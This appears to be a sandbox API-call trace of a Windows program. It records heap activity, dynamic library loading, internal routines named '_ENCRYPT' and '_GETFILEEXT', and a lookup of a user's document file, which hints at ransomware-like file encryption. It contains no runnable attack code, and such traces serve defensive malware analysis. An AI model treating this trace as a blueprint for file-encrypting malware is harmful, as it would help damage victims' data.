returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.534] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0177.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.536] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0177.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0177.536] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0177.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0177.538] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.538] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0177.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0177.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.539] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0177.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0177.539] CloseHandle (hObject=0x138) returned 1 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0177.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.540] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.540] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 1 [0177.541] TranslateMessage (lpMsg=0x87f3fc) returned 0 [0177.541] DispatchMessageW (lpMsg=0x87f3fc) returned 0x0 [0177.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.541] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea98) returned 1 [0177.544] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0177.544] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0177.544] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0177.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0177.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0177.544] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0177.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.544] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0177.544] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.544] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0177.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e0f10, ftCreationTime.dwHighDateTime=0x1d5e5c6, ftLastAccessTime.dwLowDateTime=0xf64cede0, ftLastAccessTime.dwHighDateTime=0x1d5e360, ftLastWriteTime.dwLowDateTime=0xf64cede0, ftLastWriteTime.dwHighDateTime=0x1d5e360, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="B1Y6naM2jHwq3MoZolB.ots", cAlternateFileName="B1Y6NA~1.OTS")) returned 0x90add8 [0177.546] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.546] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e0f10, ftCreationTime.dwHighDateTime=0x1d5e5c6, ftLastAccessTime.dwLowDateTime=0xf64cede0, ftLastAccessTime.dwHighDateTime=0x1d5e360, ftLastWriteTime.dwLowDateTime=0xf64cede0, ftLastWriteTime.dwHighDateTime=0x1d5e360, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="B1Y6naM2jHwq3MoZolB.ots", cAlternateFileName="B1Y6NA~1.OTS")) returned 0x90add8 [0177.546] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 